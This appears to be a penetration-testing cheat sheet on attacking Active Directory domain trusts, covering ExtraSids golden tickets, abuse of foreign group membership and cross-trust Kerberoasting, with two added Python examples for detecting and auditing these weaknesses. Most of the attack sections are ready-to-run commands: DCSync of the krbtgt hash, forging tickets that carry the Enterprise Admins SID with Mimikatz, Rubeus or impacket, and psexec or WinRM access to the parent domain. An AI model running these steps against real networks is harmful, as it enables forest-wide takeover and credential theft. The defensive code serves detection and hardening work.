Attacking Domain Trusts
ExtraSids
This attack compromises a parent domain once a child domain in the same forest has been compromised. The sidHistory attribute exists for migration scenarios: when a user is migrated from one domain to another, a new account is created in the second domain and the original account's SID is added to the new account's sidHistory attribute, so the user keeps access to resources in the original domain. Because SID filtering is not applied on the parent/child trust, an attacker can perform SID history injection and add the SID of a privileged principal from the parent domain (the Enterprise Admins group in the steps below) to the SID history of an account they control in the child domain. When this account logs in, all of the SIDs associated with it are added to the user's access token, and that token determines which resources the account can access.
We need:
1. FQDN - child domain
2. KRBTGT hash - child domain
3. SID - child domain
4. USER - child domain (does not need to exist)
5. SID of the Enterprise Admins group - root domain
Locally - Windows
Items 2 and 3 with Mimikatz. Since we have compromised the child domain, we can log in as a Domain Admin (or similar) and perform the DCSync attack to obtain the NT hash of the KRBTGT account; the same output contains the domain SID.
lsadump::dcsync /user:<CHILD_DOMAIN>\krbtgt
# take note of the Domain SID (the Object Security ID without its trailing Relative ID)
Items 3 to 5 with old or new PowerView
Get-DomainSID
Get-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsid
Item 5 with the Get-ADGroup cmdlet
Get-ADGroup -Identity "Enterprise Admins" -Server "<DOMAIN>"
With Mimikatz, create a Golden Ticket to access all resources within the parent domain
mimikatz.exe
> kerberos::golden /user:<NEW_USER> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<HASH> /sids:<ENTERPRISE_ADMIN_SID> /ptt
Check
klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$
With Rubeus, create a Golden Ticket to access all resources within the parent domain
.\Rubeus.exe golden /rc4:<HASH> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /sids:<ENTERPRISE_ADMIN_SID> /user:<NEW_USER> /ptt
Check
klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$
Remotely - Linux
Item 2 with impacket-secretsdump
secretsdump.py <FULL_CHILD_DOMAIN>/<USER>@<DC> -just-dc-user <CHILD_DOMAIN>/krbtgt
# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
Items 3 to 5 with impacket-lookupsid.py (brute-forces SIDs)
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_CHILD> | grep "Domain SID"
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Domain SID"
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Enterprise Admins"
# the result has the form <Domain_SID>-<RID_EnterpriseAdmin>
Use impacket-ticketer.py to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and in the parent domain (specified by -extra-sid).
ticketer.py -nthash <HASH> -domain <FULL_CHILD_DOMAIN> -domain-sid <CHILD_DOMAIN_SID> -extra-sid <ROOT_EnterpriseAdmin_SID> <NEW_USER>
Now import the ticket and use it
export KRB5CCNAME=<PATH_TO_FILE>.ccache
psexec.py <FULL_CHILD_DOMAIN>/<NEW_USER>@<MACHINE_NAME>.<DOMAIN> -k -no-pass -target-ip <MACHINE_IP>
Use raiseChild.py to automate the whole process
raiseChild.py -target-exec <MACHINE_IP> <FULL_CHILD_DOMAIN>/<USER_ADMIN>
Foreign Group Membership
We may see users or admins from Domain A as members of a group in Domain B. Only Domain Local groups can contain security principals from outside their own forest. In a bidirectional forest trust relationship we may therefore see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B. If we can take over that admin user in Domain A, we gain full administrative access to Domain B through the group membership.
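The two trust-boundary conditions described so far, the missing SID filtering that ExtraSids depends on and foreign principals sitting in Domain B's groups, can be checked from the defending side with the Python below. This is an added example, not code from the page or from any of the tools it lists; every SID, the domain layout and the group data are constructed, and `sid_filter` is a simplified model of the domain controller's behaviour that covers domain (S-1-5-21) SIDs only.

```python
"""Trust-boundary checks behind the ExtraSids and Foreign Group Membership
findings. Added example, not from the page: every SID, trust and group below
is constructed and does not describe any real environment."""

ROOT_SID = "S-1-5-21-1111111111-2222222222-3333333333"          # constructed forest root
CHILD_SID = "S-1-5-21-4444444444-5555555555-6666666666"         # constructed child domain (Domain B)
OTHER_FOREST_SID = "S-1-5-21-7777777777-8888888888-9999999999"  # constructed Domain A, other forest

BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}


def split_sid(sid):
    """Split a domain SID (S-1-5-21-X-Y-Z-RID) into (domain_sid, rid).
    Non-domain SIDs such as BUILTIN (S-1-5-32-*) come back as (sid, None)."""
    if not sid.startswith("S-1-5-21-"):
        return sid, None
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def sid_filter(trusted_domain_sid, pac_domain_sids, quarantine=True):
    """Model what the trusting DC does with domain SIDs carried in an inbound PAC.

    With SID filtering (quarantine) on, only SIDs whose domain part equals the
    trusted domain's SID survive; a root-domain RID 519 forged into a child
    ticket is dropped. Intra-forest (parent/child) trusts have it off by
    default, which is the gap ExtraSids uses. Simplification: only S-1-5-21
    SIDs are modelled, well-known SIDs are not. Returns (accepted, dropped)."""
    if not quarantine:
        return list(pac_domain_sids), []
    accepted, dropped = [], []
    for sid in pac_domain_sids:
        domain, rid = split_sid(sid)
        (accepted if rid is not None and domain == trusted_domain_sid else dropped).append(sid)
    return accepted, dropped


def foreign_privileged_sids(own_domain_sid, sids):
    """Flag SIDs from any other domain that carry a privileged well-known RID.
    A child-domain principal whose token or sidHistory holds <root>-519 is
    exactly the ExtraSids condition. Returns [(sid, group_name), ...]."""
    hits = []
    for sid in sids:
        domain, rid = split_sid(sid)
        if rid in PRIVILEGED_RIDS and domain != own_domain_sid:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


def foreign_members(local_domain_sid, groups):
    """Audit Domain B's groups for members from other domains (the defender's
    view of what Get-DomainForeignGroupMember enumerates).
    `groups` is a list of dicts with keys name, sid, scope, members (SID strings).
    Severity is 'high' when the group is BUILTIN\\Administrators or a privileged
    domain group, or the foreign member is itself a privileged group; otherwise
    'medium'. Returns [(group_name, member_sid, severity, scope), ...]."""
    findings = []
    for group in groups:
        _, group_rid = split_sid(group["sid"])
        privileged_group = (group["sid"] == BUILTIN_ADMINISTRATORS
                            or group_rid in PRIVILEGED_RIDS)
        for member in group["members"]:
            member_domain, member_rid = split_sid(member)
            if member_rid is None or member_domain == local_domain_sid:
                continue  # local principal: not a trust-boundary finding
            severity = "high" if privileged_group or member_rid in PRIVILEGED_RIDS else "medium"
            findings.append((group["name"], member, severity, group["scope"]))
    return findings


# Constructed inputs: a child-domain PAC carrying the root domain's RID 519,
# and three Domain B groups, two of which hold members from Domain A.
PAC_SIDS = [CHILD_SID + "-1105", CHILD_SID + "-513", ROOT_SID + "-519"]
GROUPS_DOMAIN_B = [
    {"name": "Administrators", "sid": BUILTIN_ADMINISTRATORS, "scope": "DomainLocal",
     "members": [CHILD_SID + "-500", OTHER_FOREST_SID + "-512"]},
    {"name": "Helpdesk", "sid": CHILD_SID + "-1201", "scope": "DomainLocal",
     "members": [OTHER_FOREST_SID + "-1450", CHILD_SID + "-1106"]},
    {"name": "Finance", "sid": CHILD_SID + "-1300", "scope": "Global",
     "members": [CHILD_SID + "-1107"]},
]

if __name__ == "__main__":
    print("no filtering:", sid_filter(CHILD_SID, PAC_SIDS, quarantine=False))
    print("filtering   :", sid_filter(CHILD_SID, PAC_SIDS))
    print("privileged foreign SIDs:", foreign_privileged_sids(CHILD_SID, PAC_SIDS))
    for finding in foreign_members(CHILD_SID, GROUPS_DOMAIN_B):
        print("foreign member:", finding)
```

Enabling SID filtering on an existing trust is done on the trusting side with `netdom trust <trusting_domain> /domain:<trusted_domain> /quarantine:yes`; the DC-side effect is what `sid_filter` models, and it is why the same ExtraSids steps fail across a default forest trust. The 'high' findings from `foreign_members` are the memberships that the Foreign Group Membership technique turns into a cross-domain admin path; replacing them with accounts local to Domain B closes it.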
Use the PowerView function Get-DomainForeignGroupMember
Get-DomainForeignGroupMember -Domain <DOMAIN_TARGET>
# take note of MemberName
Convert-SidToName <MemberName>
Now we can verify access to the target domain using the Enter-PSSession cmdlet to connect over WinRM.
Enter-PSSession -ComputerName <PC_NAME>.<TARGET_DOMAIN> -Credential <OUTPUT_Convert-SidToName>
Kerberoasting
Requires a domain with an inbound or bidirectional domain/forest trust.
Enumerate SPNs in the target domain with old or new PowerView
Get-DomainUser -Domain <TARGET_DOMAIN> | select samaccountname,memberof
Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /domain:<TARGET_DOMAIN> /user:<SPN> /nowrap
Crack the output offline with hashcat (-m 13100)
Enumerate SPNs in the target domain with impacket-GetUserSPNs
GetUserSPNs.py -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER>
Rerunning the command with the -request flag added gives us the TGS ticket.
GetUserSPNs.py -request -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER> [-outputfile <OUTPUT FILE>]
Crack the output offline with hashcat (-m 13100)
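From the defending side, cross-trust Kerberoasting leaves a distinctive trace in the target domain's Security log: a single requester asking for service tickets (Event ID 4769) for many different SPN accounts within a short time, typically with the RC4-HMAC ticket encryption type (0x17) that hashcat mode 13100 cracks. The following Python is an added example and not code from the page; the 4769 records are constructed in a simplified one-line key=value rendering of the event's fields, and the threshold and window are assumptions to be tuned per environment.

```python
"""Detect a Kerberoasting pattern in Windows Security Event 4769 (Kerberos
service ticket requested). Added example, not from the page; the records
below are constructed in a simplified key=value rendering of the event."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one requester (jdoe) pulls RC4 tickets for five different
# service accounts in three seconds; the other requesters are normal traffic.
SAMPLE_4769 = """
2024-05-01T10:00:01 EventID=4769 AccountName=jdoe ServiceName=svc_sql ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x17 FailureCode=0x0
2024-05-01T10:00:02 EventID=4769 AccountName=jdoe ServiceName=svc_web ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x17 FailureCode=0x0
2024-05-01T10:00:02 EventID=4769 AccountName=jdoe ServiceName=svc_backup ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x17 FailureCode=0x0
2024-05-01T10:00:03 EventID=4769 AccountName=jdoe ServiceName=svc_mssql2 ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x17 FailureCode=0x0
2024-05-01T10:00:03 EventID=4769 AccountName=jdoe ServiceName=svc_http ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x17 FailureCode=0x0
2024-05-01T10:00:04 EventID=4769 AccountName=jdoe ServiceName=WS01$ ClientAddress=::ffff:10.10.5.21 TicketEncryptionType=0x12 FailureCode=0x0
2024-05-01T10:05:00 EventID=4769 AccountName=asmith ServiceName=svc_sql ClientAddress=::ffff:10.10.7.33 TicketEncryptionType=0x12 FailureCode=0x0
2024-05-01T10:20:00 EventID=4769 AccountName=bjones ServiceName=svc_web ClientAddress=::ffff:10.10.9.9 TicketEncryptionType=0x17 FailureCode=0x0
"""

RC4_HMAC = "0x17"            # etype in 4769; AES is 0x11 (128) / 0x12 (256)
WINDOW = timedelta(minutes=5)  # assumption: tune per environment
THRESHOLD = 5                  # assumption: distinct RC4 services per requester in WINDOW


def parse_events(text):
    """Parse the constructed one-line format into dicts with a datetime 'ts'."""
    events = []
    for line in text.strip().splitlines():
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def is_user_spn_request(ev):
    """Successful RC4 ticket for a user SPN account. Computer accounts (name
    ends in $) and krbtgt are excluded: they are not crackable roast targets."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == "4769" and ev["FailureCode"] == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoasting(events, window=WINDOW, threshold=THRESHOLD):
    """One alert per (account, client address) that obtained >= threshold distinct
    RC4 service tickets inside a sliding time window."""
    by_requester = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_user_spn_request(ev):
            by_requester[(ev["AccountName"], ev["ClientAddress"])].append(ev)
    alerts = []
    for (account, client), evs in by_requester.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            services = {e["ServiceName"] for e in evs[start:end + 1]}
            if len(services) >= threshold:
                alerts.append({"account": account, "client": client,
                               "services": sorted(services),
                               "first_seen": evs[start]["ts"].isoformat()})
                break  # one alert per requester is enough
    return alerts


def rc4_service_accounts(events):
    """Service accounts that were issued any RC4 ticket: the hardening backlog."""
    return sorted({e["ServiceName"] for e in events if is_user_spn_request(e)})


if __name__ == "__main__":
    evs = parse_events(SAMPLE_4769)
    for alert in detect_kerberoasting(evs):
        print("ALERT possible Kerberoasting:", alert)
    print("accounts still issued RC4 tickets:", rc4_service_accounts(evs))
```

The trust itself cannot block this traffic, so detection on the target domain's DCs and hardening of the SPN accounts are the controls: `rc4_service_accounts` gives the list to move to AES-only keys (msDS-SupportedEncryptionTypes) and to long random passwords or group Managed Service Accounts, after which a cracked 13100 hash is no longer a realistic outcome.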